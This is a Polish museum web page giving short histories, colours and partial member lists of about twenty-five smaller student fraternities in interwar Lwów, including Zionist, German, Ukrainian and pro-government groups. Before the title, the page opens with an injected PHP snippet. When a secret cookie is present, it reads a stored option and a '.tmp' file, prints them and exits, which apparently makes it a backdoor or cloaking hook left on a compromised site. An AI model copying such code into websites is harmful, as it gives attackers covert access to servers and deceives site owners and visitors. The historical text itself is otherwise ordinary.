if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Pozostałe

W wirtualnym Muzeum Polskich Korporacji Akademickich zaprezentowano w formie osobnych opracowań historię oraz stan członkowski 18 korporacji lwowskich. Stanowiły one większość znaczących polskich korporacji funkcjonujących w owym czasie we Lwowie. Na temat pozostałych polskich korporacji oraz korporacji mniejszości narodowych wiadomo mniej. Można mieć nadzieję, że w miarę powiększania zbiorów Archiwum Korporacyjnego także te korporacje doczekają się osobnych opracowań na stronie. Tymczasem już teraz krótko zaprezentowana zostanie większość z nich.

Poniższe, zazwyczaj fragmentaryczne listy członków mniejszych korporacji lwowskich obejmują średnio po kilka bądź kilkanaście nazwisk. Będziemy wdzięczni za ich uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samych korporacjach (vide Poszukiwania).

I. Korpus Akademicki “Leopolia”

Data powstania: 20 czerwca 1893 r.
Barwy: jasnozielona – ciemnoczerwona – jasnoniebieska
Dewiza: ?

Rys historyczny

Leopolia została założona 20 czerwca 1893 r. Była korporacją wielonarodowościową wzorowaną na niemieckich związkach typu “corps”. Skupiała w szczególności Niemców, Austriaków, Polaków, Czechów, Ukraińców i Żydów. Utrzymywała kontakty z korporacjami z Czerniowiec. Działała do I wojny światowej.

Brak wiadomości o działalności korporacji w okresie po I wojnie światowej. Przynajmniej do połowy lat 30-tych odbywały się jednak spotkania grupy filistrów Leopolii.

Mało prawdopodobne, aby zbieżność nazw z powstałą w 1923 r. Polską Korporacją Akademicką “Leopolia” była zupełnie przypadkowa, choć źródła na ten temat milczą.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje sześć nazwisk.

Lista członków

 1. Baczyński, akt. ok. 1912
 2. Maks Burker, akt. ok. 1912, po I wojnie światowej właściciel nocnego lokalu “Palais de Dance” przy ul. Legionów we Lwowie
 3. Mikosza, akt. ok. 1912
 4. Weleński, akt. ok. 1912
 5. Wróbel, akt. ok. 1912
 6. Włodzimierz Załoziecki, prezes 1894

II. Akademicka Korporacja Syjonistyczna Emunah

Data powstania: 1898 r.
Barwy: ?
Dewiza: ?

Emunah powstała w 1898 r. Była korporacją żydowską. Należała do Związku Akademickich Zrzeszeń Korporacji Syjonistycznych.

III. Akademicka Korporacja Syjonistyczna Hasmonea

Data powstania: 1906 r.
Barwy: ?
Dewiza: ?

Hasmonea powstała w 1906 r. Była korporacją żydowską. Należała do Związku Akademickich Zrzeszeń Korporacji Syjonistycznych.

IV. Akademicka Korporacja Syjonistyczna Makabea

Data powstania: 1908 r.
Barwy: ?
Dewiza: ?

Makabea powstała w 1908 r. Była korporacją żydowską. Należała do Związku Akademickich Zrzeszeń Korporacji Syjonistycznych.

V. Korporacja Judea

Data powstania: przed 1914 r.
Barwy: ?
Dewiza: ?

Judea powstała przed I wojną światową. Była korporacją żydowską. Po I wojnie światowej nie kontynuowała działalności.

VI. Gascognia

Data powstania: 1913 r.
Barwy: czerwona – biała
Dewiza: ?

Rys historyczny

Gascognia została założona w 1913 r., być może w Czerniowcach, a zaraz potem przeniosła się do Lwowa. Była korporacją typu “corps”.

Brak wiadomości o działalności korporacji w okresie po I wojnie światowej. Mało prawdopodobne, aby zbieżność nazw z powstałą w 1924 r. Polską Korporacją Akademicką Gasconia była zupełnie przypadkowa, choć brak odniesień w źródłach na ten temat.

VII. Związek Akademików Niemieckich we Lwowie

Data powstania: 1922 r.
Barwy: niebieska – czerwona – złota
Dewiza: „Treu dem Volke, treu der Heimat” („Wiernie narodowi, wiernie stronom rodzinnym”)

Prezydium Związku Akademików Niemieckich we Lwowie, 1933 r.

Związek Akademików Niemieckich we Lwowie (Verein Deutscher Hochschüler Lemberg) powstał w 1922 r. z inicjatywy dra Ludwika Schneidera. Był pierwszym z powstałych w Polsce związków akademików niemieckich. Wzorowano się na tradycyjnych korporacjach, w szczególności na Związku Studentów Niemieckich (Verein Deutscher Studenten). Senat Uniwersytetu zatwierdził statut Związku w 1925 r. Kuratorami z ramienia uczelni byli prof. Jan Czekanowski (Leopolia), a od połowy lat 30-tych ks. prof. Adam Gerstman (Lutyko-Venedya, Gasconia, Obotritia)

Związek miał charakter koedukacyjny. Zrzeszał niemieckich studentów i studentki lwowskich uczelni wyższych, w większości pochodzących z Galicji Wschodniej. W ramach korporacji działała posiadająca organizacyjną autonomię “Grupa Studentek Niemieckich” (Gruppe deutscher Studentinnen). Członkowie korporacji po zakończeniu studiów byli skupieni w Kole Filistrów.

Podobnie jak w przypadku większości innych korporacji noszono (czarne) korporantki oraz bandy (szarfy) w kolorach Związku. Barwy używane były jednak zazwyczaj w trakcie spotkań w siedzibie korporacji.

Korporacja należała do powstałego w 1926 r. Zrzeszenia Związków Akademików Niemieckich w Polsce (Verband der Vereine Deutscher Hochschüler in Polen).

Całkowita ustalona, imienna lista członków obejmuje 191 nazwisk.

Po wojnie członkowie korporacji należeli do działającego w Republice Federalnej Niemiec Zrzeszenia Związków Akademików Niemieckich w Polsce (Verband der Vereine Deutscher Hochschüler Polens).

VIII. Fraternitas

Data powstania: 1924 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Fraternitas powstała w 1924 r. Miała być jedną z trzech działających w 20-leciu międzywojennym w Polsce żydowskich korporacji akademickich o charakterze asymilanckim. Nawiązywała tym samym do popularnych w społeczności żydowskiej w XIX w., ale w znacznym stopniu wypartych pod wpływem idei syjonistycznych, poglądów o konieczności walki o równouprawnienie Żydów połączonej z wyrzeczeniem się przez nich świadomości narodowej na rzecz ich przekształcenia w „Polaków wyznania mojżeszowego”.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje zaledwie trzy nazwiska.

Lista członków

 1. Józef Kuttin, prezes
 2. Reich, s. Leona
 3. Henryk Vogelfänger (Braun-Vogelfänger), (4 października 1904 we Lwowie - 6 października 1990 w Warszawie) absolwent VI Gimnazjum im. S. Staszica we Lwowie, student i absolwent prawa UJK, olderman, adwokat, redaktor lwowskiej “Wesołej Fali” ps. “Tońcio”, w czasie wojny żołnierz 1 Dywizji Pancernej gen. S. Maczka, po wojnie na emigracji w Wielkiej Brytanii, przyjął nazwisko Henry Barker, w 1988 wrócił do Polski

IX. Akademicka Korporacja Syjonistyczna Hebronia

Data powstania: 1924 r.
Barwy: ?
Dewiza: ?

Hebronia powstała w 1924 r. Była korporacją żydowską. Należała do Związku Akademickich Zrzeszeń Korporacji Syjonistycznych.

X. Akademicka Korporacja Syjonistyczna Barissia

Data powstania: 1925 r.
Barwy: ?
Dewiza: ?

Barissia powstała w 1925 r. Była korporacją żydowską. Należała do Związku Akademickich Zrzeszeń Korporacji Syjonistycznych.

XI. Akademicka Korporacja Syjonistyczna Zelotia

Data powstania: 1925 r.
Barwy: ?
Dewiza: ?

Zelotia powstała w 1925 r. Była korporacją żydowską. Należała do Związku Akademickich Zrzeszeń Korporacji Syjonistycznych.

Zaproszenie na Tradycyjny Bal Osnowy 20 II 1930 r.

XII. Towarzystwo Ukraińskich Studentów Politechniki “Osnowa” we Lwowie (Товариство Українських Студентів Політехніки “Основа” у Львові)

Data powstania: przed kwietniem 1928 r.
Barwy:
Dewiza:

Osnowa miała być korporacją studentów ukraińskich. Skupiała słuchaczy Politechniki Lwowskiej. Władze uczelni zatwierdziły działalność korporacji prawdopodobnie w początkach 1928 r.

XIII. Szczerbiec

Dekiel T.K.

Data powstania: kwiecień 1928 r.
Barwy: drapowa – czerwona – złota
Dewiza: ?

Rys historyczny

Szczerbiec powstała w kwietniu 1928 r. Współpracowała z Towarzystwem Szkoły Ludowej.

Była korporacją chrześcijańską i od 1929 r. należała do Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich.

Z powodu braku członków w semestrze zimowym 1933/34 r. połączyła się z lwowską K! Orlęta kresowe. Połączone korporacje działały jako “Orlęta kresowa”, na codzień używno jednak nazwy „Orlęta-Szczerbiec”. W nieznanych okolicznościach w lutym 1938 r. z połączonych korporacji wyłoniła się ponownie K! Szczerbiec.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje cztery nazwiska.

Lista członków

 1. Witold Goszkowski (Góżkowski), członek Korporacji Szczerbiec (później Orlęta-Szczerbiec), po wojnie dyrektor administracyjny PŚ w Gliwicach
 2. Zdzisław Kwaśniewski, (19 grudnia 1909 - 1978 w Łodzi) s. wojewody lwowskiego, absolwent VI (?) Gimnazjum we Lwowie 1927, student i absolwent 1931 prawa UJK, akt. 1927-32 Gasconia (?), później członek Szczerbca, po wojnie adwokat w Łodzi
 3. Andrzej Świerczyński, członek Korporacji Szczerbiec (później Orlęta-Szczerbiec), prawnik, adwokat, po wojnie na emigracji w Wielkiej Brytanii
 4. Mieczysław Wojtyna, (1917- 10 kwietnia 1977) członek Korporacji Szczerbiec (później Orlęta-Szczerbiec), adiunkt w Instytucie Nauk Społecznych i Ekonomicznych PK, dr habilitowany, autor wielu prac z zakresu prawa cywilnego, odznaczony Złotym Krzyżem Zasługi i Złotą Odznaką ZNP

XIV. Ikaria

Data powstania: kwiecień 1928 r.
Barwy: wiśniowa – złota – zielona
Dewiza: ?

Rys historyczny

Ikaria została założona w kwietniu 1928 r.

Była korporacją chrześcijańską i od maja 1928 r. należała do Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich.

Współpracowała z Ligą Obrony Powietrznej i Przeciwgazowej. Była jedną z nielicznych korporacji lwowskich, które wydawały własny biuletyn.

Prawdopodobnie zaprzestała działalności przed 1935 r.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje siedem nazwisk, w tym jednego członka honorowego (?).

Brak informacji o działalności Ikarii oraz spotkaniach jej członków w czasie wojny i w okresie powojennym.

Lista członków

 1. Leon Berbecki, (?) (28 lipca 1874 - 23 marca 1963) generał, Filister honorowy Ikarii (?)
 2. Szczepan Bocheński, prawnik
 3. Władysław Rothäusler, absolwent I Gimnazjum we Lwowie 1930, student UJK, po wojnie na Śląsku
 4. Ferdynand Skomorowski,
 5. Romuald Włodzimierz Benedykt Śliwiński, (1909 w Jarocinie - 26 stycznia 1984) student i absolwent AMW, fuks w Lutyko-Venedyi, przeszedł do Ikarii, adiunkt AMW
 6. Adam Willman, (1908-1995) wieloletni prezes Ikarii, inspektor LOPP we Lwowie, po II wojnie światowej wiceminister Spraw Zagranicznych, ambasador w Finlandii
 7. Kazimierz Witulski, (1908-1984) prawnik, adwokat

XV. Swentowid

Data powstania: listopad 1928 r.
Barwy: ciemnozielona – złota – seledynowa
Dewiza: ?

Rys historyczny

Swentowid została założona przez siedmiu lwowskich studentów w 1928 r. Powstała z nieformalnej (?) organizacji (grupy) studenckiej (?) “Klub Słonia”.

Była korporacją chrześcijańską i od 1929 r. należała do Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich.

Korporacja działała na pewno do końca 1936 r. Według niepotwierdzonych informacji mogła później zaprzestać działalności.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje osiem nazwisk.

Brak informacji o działalności Swentowida oraz spotkaniach jej członków w czasie wojny i w okresie powojennym.

Lista członków

 1. J. Adamiczka, (?), wiceprezes Lwowskiego Koła Środowiskowego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1930
 2. Henryk Bednarski, ( - 1991 w Krakowie) założyciel Swentowida
 3. A. Geneja
 4. Józef Górski, założyciel Swentowida (?), wiceprezes Bratniej Pomocy PL 1937
 5. Gustaw Jakubowski, ( - po 1979), założyciel Swentowida
 6. S. Jurek, (?), sekretarz Lwowskiego Koła Środowiskowego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1930
 7. Aleksander Martyniak, założyciel Swentowida, prezes Lwowskiego Koła Środowiskowego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1930
 8. K. Skrzypecki, (?), olderman Lwowskiego Koła Środowiskowego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1930

XVI. Promethea

Data powstania: 16 III 1928 r.
Barwy: stalowa – czerwona – srebrna
Dewiza: ?

Rys historyczny

Promethea, Lwów 16 III 1929 r.

Promethea powstała dnia 16 III 1928 r. Szczególnym celem korporacji była praca społeczna “nad propagandą polskiego morza”.

Początkowo należała do Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich. Po krótkim czasie wystąpiła, a od dnia 7 XII 1928 r. była członkiem Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 7 II 1929 r.). Kandydowała pod opieką K! Lutyko-Venedya. Uchwałą Lwowskiego Koła Międzykorporacyjnego została wykluczona ze Związku za udział w pochodzie na cześć Marszałka Józefa Piłsudskiego dnia 19 III 1930 r. W 1931 r. wraz z K! Bellona i K! Fidelia Leopoliensis stworzyła sanacyjny związek międzykorporacyjny - Radę Legionu Korporacyjnego - Okręg Lwowski, a następnie należała do grupy korporacji, które w 1932 r. stworzyły sanacyjny ogólnopolski związek międzykorporacyjny - Federację Polskich Korporacji Akademickich.

Prawdopodobnie w połowie lat 30-tych zaprzestała działalności.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 18 nazwisk, w tym czterech członków honorowych.

Brak informacji o działalności Promethei oraz spotkaniach jej członków w czasie wojny i w okresie powojennym.

Lista członków

 1. Jarosław Demiańczuk, II wiceprezes Rady Legionu Korporacyjnego we Lwowie sem. zim. 1932/33
 2. Dudziński, prof., Filister honorowy Promethei
 3. Górniak, prof. Wyższej Szkoły Handlu Zagranicznego, Filister honorowy Promethei
 4. Zygmunt Kaczorowski, gospodarz sem. let. 1930/31
 5. Stefan Kamis (?),
 6. Alfred Kohman (?), prezes sem. let. 1930/31
 7. E. Kügler, członek Rady Legionu Korporacyjnego we Lwowie sem. let. 1930/31
 8. Zdzisław Podgórski,
 9. Witold Pohlman, wiceprezes i skarbnik sem. let. 1930/31
 10. R. Prystupa
 11. Jan Rozmiłowski, przewodniczący Rady Legionu Korporacyjnego we Lwowie sem. let. 1930/31
 12. Ryszard Siwiec, (7 marca 1909 w Dębicy - 12 września 1968 w Warszawie) student i absolwent filozofii UJK, żołnierz AK, sekretarz sem. let. 1930/31, po wojnie pracował jako księgowy w Przemyślu, protestując przeciw inwazji wojsk Paktu Warszawskiego na Czechosłowację dokonał samospalenia w czasie ogólnokrajowych dożynek na Stadionie Dziesięciolecia w obecności szefów partii, dyplomatów i 100 tysięcy widzów, zmarł cztery dni później w szpitalu w wyniku odniesionych oparzeń, pochowany na Cmentarzu Zasańskim w Przemyślu, pośmiertnie odznaczony m.in. czeskim Orderem Tomáša Masaryka pierwszej klasy, Krzyżem Komandorskim OOP, czeskim , słowackim Orderem Podwójnego Białego Krzyża III klasy, jego imieniem nazwano most w Przemyślu, ulice w Warszawie i Pradze, przy Stadionie Narodowym w Warszawie znajduje się obelisk upamiętniający jego osobę
 13. Jan Stepa, ks., prof., Filister honorowy Promethei
 14. Szaulski, ( - 1932) zmarł śmiercią tragiczną (samobójstwo)
 15. Tadeusz Świderski, ? ( - 1988 w Krakowie)
 16. Zbigniew Urban, skarbnik Rady Legionu Korporacyjnego we Lwowie sem. zim. 1932/33
 17. K. (…) St. Wróblewski, olderman sem. let. 1930/31
 18. K. Zakrzewski, doc., Filister honorowy Promethei

XVII. Polska Akademicka Korporacja “Bellona”

Data powstania: 11 II 1930 r.
Barwy: zielona – złota – biała
Dewiza: ?

Rys historyczny

Pieczęć Bellony, 1930 r.

Bellona powstała dnia 11 II 1930 r.

W 1930 r. korporacja została przyjęta do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 25 II 1930 r.). Za podpisanie wypowiedzi w sprawie brzeskiej, wykluczona ze Związku. Blisko współpracowała ze Związkiem Strzeleckim. W 1931 r. wraz z K! Promethea i K! Fidelia Leopoliensis stworzyła sanacyjny związek międzykorporacyjny - Radę Legionu Korporacyjnego - Okręg Lwowski, a następnie należała do grupy korporacji, które w 1932 r. stworzyły sanacyjny ogólnopolski związek międzykorporacyjny - Federację Polskich Korporacji Akademickich.

Prawdopodobnie ok. 1936 r. Bellona zaprzestała działalności.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje jedenaście nazwisk.

Brak informacji o działalności Bellony oraz spotkaniach jej członków w czasie wojny i w okresie powojennym.

Lista członków

 1. Kazimierz Bacz,
 2. Wacław Gajdzik, II wiceprezes sem. let. 1930/31
 3. Józef Kowalczyk, II wiceprzewodniczący Rady Legionu Korporacyjnego we Lwowie sem. let. 1930/31
 4. Marian Kowalczyk, I wiceprzewodniczący Rady Legionu Korporacyjnego we Lwowie sem. zim. 1932/33

  Zbyszko Piotrowski, 1930 r.

 5. Zbyszko Piotrowski, c. 1930

 6. Franciszek Płoszaj, sekretarz sem. let. 1930/31
 7. Tadeusz Janta-Połczyński, olderman sem. let. 1930/31, członek Rady Legionu Korporacyjnego we Lwowie sem. let. 1930/31
 8. Stefan Rupiński, skarbnik sem. let. 1930/31
 9. Michał Sternik, I wiceprezes sem. let. 1930/31
 10. Adam Vogelninger (?), prezes sem. let. 1930/31
 11. Zamorski, student chemii PL, założyciel Bellony

XVIII. Fidelia Leopoliensis

Data powstania: 20 XI (?) 1930 r.
Barwy: khaki – złota – bordowa
Dewiza: ?

Rys historyczny

Fidelia powstała dnia 20 XI (?) 1930 r. Blisko współpracowała z Legionem Młodych.

W 1931 r. wraz z K! Promethea i K! Bellona powołała sanacyjny związek międzykorporacyjny - Radę Legionu Korporacyjnego - Okręg Lwowski, a następnie należała do grupy korporacji, które w 1932 r. stworzyły sanacyjny ogólnopolski związek korporacji - Federację Polskich Korporacji Akademickich.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 28 nazwisk.

Brak informacji o działalności Fidelii oraz spotkaniach jej członków w czasie wojny i w okresie powojennym.

Lista członków

 1. Marceli (Igo) Arzt, gospodarz i referent oświatowy sem. zim. 1932/33
 2. Stefan Bator, wiceprezes sem. let. 1930/31, członek Komisji Rewizyjnej sem. let. 1931/32 oraz sem. zim. 1932/33
 3. Władysław Bieniowski, członek Komisji Rewizyjnej sem. zim. 1931/32
 4. Mieczysław (Marian) Chirowski, prezes sem. let. 1930/31, członek Komisji Rewizyjnej sem. zim. 1931/32, członek Rady Legionu Korporacyjnego we Lwowie sem. let. 1930/31
 5. Jerzy Cieńciała, skarbnik sem. zim. 1932/33
 6. Aleksander Decowski,
 7. Zygmunt Ewy, ( - 22 czerwca 1994) prof. Akademii Rolniczej w Krakowie
 8. Maciej St. Freudman, (1912 - 1939) student prawa UJK, członek Fidelii Leopoliensis, założyciel lwowskiej Chrobrii, jej prezes sem. zim. 1931/32 oraz sekretarz sem. zim. 1932/33, poeta, literat, członek grupy literackiej “Rybałci”, zamordowany przez NKWD w październiku 1939 we Lwowie podczas zjazdu literatów Ukrainy, gdy mówcy lżyli Polskę, sprzeciwił się temu, zrzucony ze schodów Kas.a Miejskiego został zmasakrowany i dobity z obstawy sali
 9. Konstanty Habuch, członek Komisji Rewizyjnej sem. let. 1931/32
 10. Józef Handler, wiceprezes sem. zim. 1931/32, członek Komisji Rewizyjnej sem. zim. 1932/33
 11. Bronisław Haczewski, student prawa UJK, prezes sem. zim. 1931/32 oraz sem. let. 1931/32, I wiceprzewodniczący Rady Legionu Korporacyjnego we Lwowie sem. let. 1930/31, wiceprezes Towarzystwa Biblioteki Słuchaczy Prawa 1929/30, mgr
 12. Józef Jabłoński,
 13. Roman Jedlewski, olderman sem. let. 1930/31, olderman sem. zim. 1931/32
 14. Zygmunt Kaczorowski, ( - zm. w Budapeszcie) w czasie wojny internowany na Węgrzech, po wojnie wydał dobry przewodnik po Polsce
 15. Władysław Kazieczko, skarbnik sem. let. 1930/31, członek Komisji Rewizyjnej sem. let. 1931/32
 16. Zbigniew Jastrzębiec-Krassowski, działacz Akademickiej Ligi Polsko-Rumuńskiej, początkowo (?) w Korporacji Fidelia, później (?) założyciel lwowskiej Chrobrii, wiceprezes wewn. sem. zim. 1931/32
 17. Adam Kruczkowski, członek Komijsji Rewizyjnej sem. zim. 1932/33
 18. Kazimierz (Jan?) Kurtyanek (Kurtyaczak), skarbnik sem. zim. 1931/32
 19. Bronisław Maczewski, przewodniczący Rady Legionu Korporacyjnego we Lwowie sem. zim. 1932/33
 20. Mieczysław Malski, gospodarz sem. let. 1931/32, wiceprezes sem. zim. 1932/33
 21. Leopold Nowosad, zastępca sekretarza sem. let. 1930/31
 22. Ryszard Opałek, sekretarz sem. zim. 1931/32 oraz sem. let. 1931/32, prezes sem. zim. 1932/33, w 1950 naczelnik Urzędu Skarbowego w Nowym Sączu
 23. Jan Piekarz, członek Komisji Rewizyjnej sem. zim. 1931/32
 24. Stanisław Popowicz, wiceprezes i skarbnik sem. let. 1931/32,
 25. Zbigniew Przygórski, kronikarz sem. let. 1931/32, olderman sem. zim. 1932/33,
 26. Jan Szary,
 27. Władysław Wójcik,
 28. Stefan Żółnierczyk, sekretarz sem. let. 1930/31, gospodarz sem. zim. 1931/32, olderman sem. let. 1931/32

XIX. Akademicka Korporacja Syjonistyczno-Rewizjonistyczna Galijah

Data powstania: 1930 r.
Barwy: ?
Dewiza: ?

Galijah powstała w 1930 r. Była korporacją żydowską. Należała do nurtu syjonistyczno-rewizjonistycznego.

Lista członków

 1. N. Bidermann, sekretarz Związku Filistrów Żydowskich Korporacji Syjonistycznych w Polsce 1933

XX. Chrobria Leopoliensis

Data powstania: 29 V 1931 r.
Barwy: niebieska – złota – karminowa
Dewiza: ?

Rys historyczny

Chrobria powstała dnia 29 V 1931 r. Prawdopodobnie została założona z inspiracji K! Fidelia. Miała mieć charakter szlachecki.

Obok K! Promethea, K! Bellona, K! Fidelia należała do sanacyjnej Rady Legionu Korporacyjnego - Okręg Lwowski.

Prawdopodobnie zaprzestała działalności już w 1932 r.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje sześć nazwisk.

Brak informacji o działalności Fidelii oraz spotkaniach jej członków w czasie wojny i w okresie powojennym.

Lista członków

 1. Jerzy Ciamciała (?), wiceprezes zewn. sem. zim. 1931/32
 2. Szczęsny Czołowski, gospodarz sem. zim. 1931/32
 3. Maciej St. Freudman, (1912 - 1939) student prawa UJK, członek Fidelii Leopoliensis, założyciel Chrobrii, jej prezes sem. zim. 1931/32 oraz sekretarz sem. zim. 1932/33, poeta, literat, członek grupy literackiej “Rybałci”, zamordowany przez NKWD w październiku 1939 we Lwowie podczas zjazdu literatów Ukrainy, gdy mówcy lżyli Polskę, sprzeciwił się temu, zrzucony ze schodów Kasa Miejskiego został zmasakrowany i dobity z obstawy sali
 4. Tadeusz Kazimierowicz, sekretarz sem. zim. 1931/32
 5. Tadeusz Koperski, olderman sem. zim. 1931/32
 6. Zbigniew Jastrzębiec-Krassowski, działacz Akademickiej Ligi Polsko-Rumuńskiej, założyciel Chrobrii, wiceprezes wewn. sem. zim. 1931/32

XXI. Polska Korporacja Studentów Inżynierji Lasowej “Silvania”

Data powstania: 21 III 1930 r.
Barwy: jasnopopielata – złota – niebieska
Dewiza: ?

Rys historyczny

Silvania została założona w 1930 r. przez studentów leśnictwa Wydziału Rolniczo-Lasowego Politechniki Lwowskiej. Była korporacją wydziałową leśników. Postanowiono, że szczególnym celem korporacji miała być praca na rzecz ochrony przyrody, w szczególności lasów polskich.

Od października 1931 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: październik 1931 r.). Kandydowała pod opieką K! Leopolia.

Z powodu małej liczby studentów oraz braku perspektyw rozwojowych została rozwiązana w styczniu 1932 r.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 23 nazwiska.

Lista członków

 1. Zygmunt Cza…,
 2. Adam Gorbel (G (?) or (?) bel (?),
 3. Henryk Greima,
 4. Zygmunt Grodecki (?),
 5. Aleksander Halser (?), sekretarz 1930
 6. Tadeusz Har (?) bloch (?),
 7. Stanisław Bolesław Januszkiewicz (1912 w Jarosławiu - 1939-45) student i absolwent 1938 leśnictwa PL, założyciel Silvanii, po jej rozwiązaniu w Gasconii, czynny w ZWZ i AK na ziemi krakowskiej, aresztowany przez Gestapo i zamordowany w więzieniu
 8. Eugeniusz Maciaszak ? (Marciniak ?),
 9. Włodzimierz Norbulba (?),
 10. Jerzy Nowak,
 11. Adam Ożga (?),
 12. Bolesław Ożga (?),
 13. Adam Pauli,
 14. Czesław Parlich (?),
 15. Jan Podmagórski (?),
 16. Stanisław Politalski (?),
 17. Adam Rogoszewski (?), prezes 1930
 18. Tadeusz Romański,
 19. Piotr Sumiński,
 20. Zbigniew Szeffner,
 21. Kazimierz Świecicki,
 22. Kazimierz Zastowiecki,
 23. Artur Żebracki,

XXII. Kadra

Data powstania: 15 (10 ?) X 1932 r.
Barwy: pomarańczowa – srebrna – bordowa
Dewiza: ?

Rys historyczny

Kadra została założona dnia 15 (10 ?) X 1932 r. przez grupę studentów należących do Legionu Młodych. Należała do korporacji sanacyjnych.

Od 1932/33 r. należała do sanacyjnego związku międzykorporacyjnego - Federacji Polskich Korporacji Akademickich.

Prawdopodobnie zaprzestała działalności przed 1935 r.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje cztery nazwiska. W 1932 r. miała liczyć ok. 30 członków.

Brak informacji o działalności Kadry oraz spotkaniach jej członków w czasie wojny i w okresie powojennym.

Lista członków

 1. M. Kmala, pierwszy olderman sem. zim. 1932/33
 2. Lubowicki, pierwszy prezes sem. zim. 1932/33
 3. Nowak, pierwszy wiceprezes sem. zim. 1932/33
 4. Zaczek, pierwszy sekretarz sem. zim. 1932/33

XXIII. Gdynia

Data powstania: 1935 r.
Barwy: ciemno niebieska – srebrna – błękitna
Dewiza: ?

Rys historyczny

Gdynia powstała w 1935 r. z inicjatywy działaczy Myśli Mocarstwowej braci Aleksandra i Adolfa Bocheńskich. Blisko współpracowała z Ligą Morską i Kolonialną.

Od 1932/33 r. należała do sanacyjnego związku międzykorporacyjnego - Federacji Polskich Korporacji Akademickich.

Prawdopodobnie zaprzestała działalności przed 1939 r.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje osiem nazwisk.

Brak informacji o działalności Gdynii oraz spotkaniach jej członków w czasie wojny i w okresie powojennym.

Lista członków

 1. Adolf Bocheński, (13 kwietnia 1909 w Ponikwie pow. Brody - 18 lipca 1944 pod Ankoną we Włoszech) brat Józefa Marii (Corona) i Aleksandra (Gdynia Leopoliensis) pisarz i publicysta polityczny, działacz “Myśli Mocarstwowej”, kawaler maltański, ppor. Pułku Ułanów Karpackich w II Korpusie PSZ na Zachodzie, zginął na minie pod Ankoną, pochowany na cmentarzu wojennym w Loretto
  [Źródła (poza wskazanymi poniżej spisu członków): Robert Zadura, Saga rodu Bocheńskich (O przodkach, rodzinie i młodości o. Józefa Marii Bocheńskiego), Kraków 2013]

 2. Aleksander Bocheński, (6 sierpnia 1904 w Czuszowie k. Miechowa - 12 stycznia 2001 w Warszawie) brat Józefa Marii (Corona) i Adolfa (Gdynia Leopoliensis) eseista, publicysta, tłumacz i polityk
  [Źródła (poza wskazanymi poniżej spisu członków): Robert Zadura, Saga rodu Bocheńskich (O przodkach, rodzinie i młodości o. Józefa Marii Bocheńskiego), Kraków 2013]

 3. Roman Felsztyński,
 4. Piotr Gruszka, prof. filologii Uniwersytetu Gdańskiego
 5. Marian Stokłosa, po wojnie prawnik w Łańcucie
 6. Zygmunt Stokłosa, założyciel i pierwszy prezes Gdynii
 7. Uniechowicz (Uchowicz?), po wojnie ok. 1950 pracownik UB
 8. Jan Wagner,

XXIV. Polska Korporacja Akademicka “Przedświt” we Lwowie

Data powstania:
Barwy: stalowa – złota – czerwona
Dewiza: ?

Zaproszenie na wieczór karnawałowy Korpusu 16 I 1937 r.

XXV. Korpus Zawisza Czarny

Data powstania: 1924 r. (?)
Barwy: złoto-granatowo-czerwone
Dewiza: ?

Korpus Zawisza Czarny, Lwów 1935 r.

Zgodnie z nazwą Zawisza Czarny należał do korporacji typu korpusowego. Skupiał studentów Akademii Medycyny Weterynaryjnej we Lwowie.

Prawdopodobnie należał do Związku Polskich Korpusów Studenckich. Działał do wybuchu II wojny światowej.

Lista członków

 1. Władysław Jaroszewski, członek Koła Filistrów Polskich Korporacji Akademickich w Chicago

  Wacław Pietraszewski, 1935 r.

 2. Wacław Pietraszewski, ( - ok. 1990) w czasie okupacji więziony na Zamku Lubelskim, lekarz weterynarii, po wojnie osiadł w Gdańsku

  Tadeusz Rejnisz, 1931 r.

 3. Tadeusz Rejnisz, (12 stycznia 1910 w Ząbkach k. Warszawy - 2 maja 1945 w Berlinie) s. Eugeniusza i Zofii z d. Buciek, absolwent prywatnego Gimnazjum im. H. Jordana we Lwowie, student i absolwent AMW 1931-38, dyplom 1944, prezes Zawiszy Czarnego, po otrzymaniu absolutorium pracował w Skałacie, Dederkałach, Wiśniowcu i Krzemieńcu, a po ucieczce z Wołynia w połowie 1943 w mleczarni w Przemyślu, w 1944 wcielony do LWP, ppor. Pierwszego Praskiego Pułku Piechoty I Dywizji Kościuszkowskiej, przeszedł szlak bojowy: Warszawa, Bydgoszcz, Wał Pomorski, Szczecin, Berlin, zaginął bez wieści 2 maja w Berlinie

  Alfred Świtalski, przed 1935 r.Alfred Świtalski, przed 1935 r.

